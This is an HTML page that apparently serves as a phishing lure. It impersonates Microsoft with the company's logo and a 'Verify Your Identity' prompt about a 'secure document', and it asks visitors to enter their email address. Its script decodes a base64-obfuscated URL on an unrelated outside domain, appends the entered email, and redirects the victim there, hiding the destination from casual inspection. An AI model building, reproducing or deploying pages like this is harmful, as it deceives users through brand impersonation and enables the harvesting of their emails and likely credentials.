<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Verify Your Identity</title>
    <style>
        body {
            font-family: "Segoe UI", "Segoe UI Web (West European)", -apple-system, BlinkMacSystemFont, Roboto, "Helvetica Neue", sans-serif;
            background-color: #f4f4f4;
            margin: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            color: #333;
            background-image: url('https://media.istockphoto.com/id/1433196601/photo/photograph-of-pure-blue-summer-sky.jpg?s=612x612&w=0&k=20&c=V-icg9KatJz_Q1vGPNs4iChmJYqJyFCDGtVVFaX4OJs=');
            background-size: cover;
            background-position: center;
        }

        .header {
            width: 100%;
            background-color: #0078d4;
            color: white;
            text-align: left;
            padding: 10px 20px;
            box-sizing: border-box;
            font-size: 18px;
            position: absolute;
            top: 0;
        }

        .header span {
            margin-left: 20px;
        }

        .container {
            background-color: white;
            border: 1px solid #ccc;
            border-radius: 3px;
            padding: 33px;
            width: 80%;
            max-width: 300px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            text-align: center;
            margin-top: 0px;
        }

        .container img {
            width: 100px;
            margin-bottom: 20px;
        }

        .container h2 {
            font-size: 24px;
            margin-bottom: 20px;
            color: #333;
        }

        .container p {
            margin-bottom: 10px;
            color: #666;
        }

        .container p2 {
            display: block;
            margin-bottom: 10px;
            color: #666;
            font-size: 13px;
            margin-bottom: 20px;
        }

        .container input[type="email"] {
            width: 100%;
            padding: 10px;
            margin-bottom: 20px;
            border: 1px solid #ccc;
            border-radius: 3px;
            font-size: 16px;
            box-sizing: border-box;
            text-align: center;
        }

        .container button {
            width: 100%;
            padding: 10px;
            background-color: #0078d4;
            color: white;
            border: none;
            border-radius: 3px;
            font-size: 16px;
            cursor: pointer;
        }

        .container button:hover {
            background-color: #005a9e;
        }

        .container .footer {
            font-size: 12px;
            color: #888;
            margin-top: 20px;
        }

        @media (max-width: 600px) {
            .container {
                padding: 20px;
            }

            .container h2 {
                font-size: 20px;
            }

            .container .space {
                margin-bottom: 20px;
            }

            .container input[type="email"] {
                font-size: 14px;
            }

            .container button {
                font-size: 14px;
            }
        }
    </style>
</head>
<body>
    
    <div class="container">
        <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/9/96/Microsoft_logo_%282012%29.svg/1280px-Microsoft_logo_%282012%29.svg.png" alt="soft Logo">
        <h2>Verify Your Identity</h2>
        <p><strong>You've received a secure document:</strong></p>
        <p2>To access this secure document, we'll need to verify the intended recipient's email. Please enter the email address to which this document was shared.</p2>
        <input type="email" id="email-input" placeholder="Enter email" required style="margin-top: 10px;">
        <button id="continue-button">Next</button>
        
    </div>

    <script>
        function continueLoading() {
            const emailInput = document.getElementById('email-input');
            const email = emailInput.value.trim().toLowerCase();

            if (validateEmail(email)) {
                const link = "aHR0cHM6Ly9icnVrdHYuY29tL24vP2MzWTliek0yTlY4eFgyNXZiU1p5WVc1a1BWUXdjRFJqUmswOUpuVnBaRDFWVTBWU01Ea3dPREl3TWpSVk1ESXdPREE1TURZPU4wMTIzTg=="; // Base64 encoded link
                const decodedLink = atob(link);
                const finalLink = `${decodedLink}#${email}`;
                window.location.href = finalLink;
            } else {
                alert("Please enter a valid email address.");
            }
        }

        function validateEmail(email) {
            const re = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
            return re.test(email);
        }

        document.getElementById('continue-button').addEventListener('click', continueLoading);
        document.getElementById('email-input').addEventListener('keydown', function(event) {
            if (event.key === 'Enter') {
                continueLoading();
            }
        });
    </script>
</body>
</html>
